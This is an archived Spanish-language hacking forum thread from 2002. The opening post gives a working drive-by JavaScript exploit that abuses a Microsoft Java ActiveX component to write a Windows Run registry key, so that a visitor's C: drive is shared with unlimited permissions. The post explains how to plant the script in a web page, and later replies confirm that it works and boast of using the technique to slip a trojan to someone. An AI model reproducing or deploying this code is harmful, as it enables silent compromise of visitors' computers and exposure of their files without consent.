PDA

Ver la versión completa : JavaScript que puede modificar el registro



MANDALA
06-03-2002, 03:48
Existe una manera de poder añadir claves al registro mediante un código JavaScript, lo que es lo mismo, es posible que al visitar una web, sin darnos cuenta, se estén añadiendo claves potencialmente peligrosas.

Esto es un ejemplo sencillo que reproduce el fallo, introduciendo este códigoen una web, se consigue el efecto deseado, modificando el registro de la víctima.

#script#
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion \\Run\\share", "cmd.exe /c net share c=c:\ /UNLIMITED");


}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

#/script#

(sustituye los simbolos "#script#" y "#/script#" para ke funcione.

Este sencillo script va a intoducir una clave en el inicio del Windows que hará que se comparta la unidad c:\ con permisos ilimitados, mediante la ejecución del comando:

net share c=c:\ /UNLIMITED

Tal vez no sea la manera mas limpia de compartir una unidad (podríamos haber introducido directamente las claves necesarias en

"HKLM\SYSTEM\CurrentControlSet\Services\lanmanserve r\Shares\Security"

que es la clave del registro que se ocupa de ello), pero si creo que es una manera mucho mas explicativa.

Aunque esto es sólo un ejemplo, hay que recordar para los que no estén muy al dia, que manipulando adecuadamente el registro de un Windows, podemos hacer con ese sistema "casi" cualquier cosa que deseemos.

NeoGenessis
06-03-2002, 15:39
El javaScript y el VisualBasic Script estan integrados en Winzorra desde la version 98. Pero estos son algo distintos de los que se usan en Web. Hay caracteristicas que no estan habilitadas en Los apllets dentro del HTML.

¿Has provado a ponerlo en una Wé a ver si chuta?

CrAcKzMe
06-03-2002, 19:09
Aaahaah, yo usé esa tecnica para colarle un troyano, que el lo veía como *.txt mandala. Bien :)

MANDALA
07-03-2002, 00:31
Si chuta,tb lo puedes meter en un servlet

CrAcKzMe
08-03-2002, 20:22
Servlet??

MANDALA
09-03-2002, 15:39
Los Servlets son las respuesta de la tecnología Java a la programación CGI. Son programas que se ejecutan en un servidor Web y construyen páginas Web.

esse CrAcKzMe !!

brassoy
10-03-2002, 15:27
cañero,cañero
yo sabia q de esta manera se podia hacer q visitando una pagina,se ejecute el archivo q quieras en el ordena de quien lo visita pero esta ya es al bomba:D
alguien x ahi tiene algun manual sencillito pa aprender script???????????

Dupont
05-04-2002, 15:44
Eso está muy de moda en las pages porno.... A un conocido mio se le metió de página de inicio en el Internet Explorer la página porno que visitó, pero no sólo se le metió en las opciones de internet, sino que tambien lo hizo en el registro del sistema. Tras reiniciar el sistema y ver que nada había cambiado me fui al registro y .... voilá.... allí estaba la clave que habían introducido. Es una putada, desde luego.

Este tipo de cosas suelen pasar si se usan M$ Windows y esas cochinadas....

CrAcKzMe
05-04-2002, 15:48
Ese code es triunfante ;) seeeeeee Dupontttttt

averno
17-01-2004, 03:25
mu buen articulo sacado de cyruxnet.com.ar--->:0=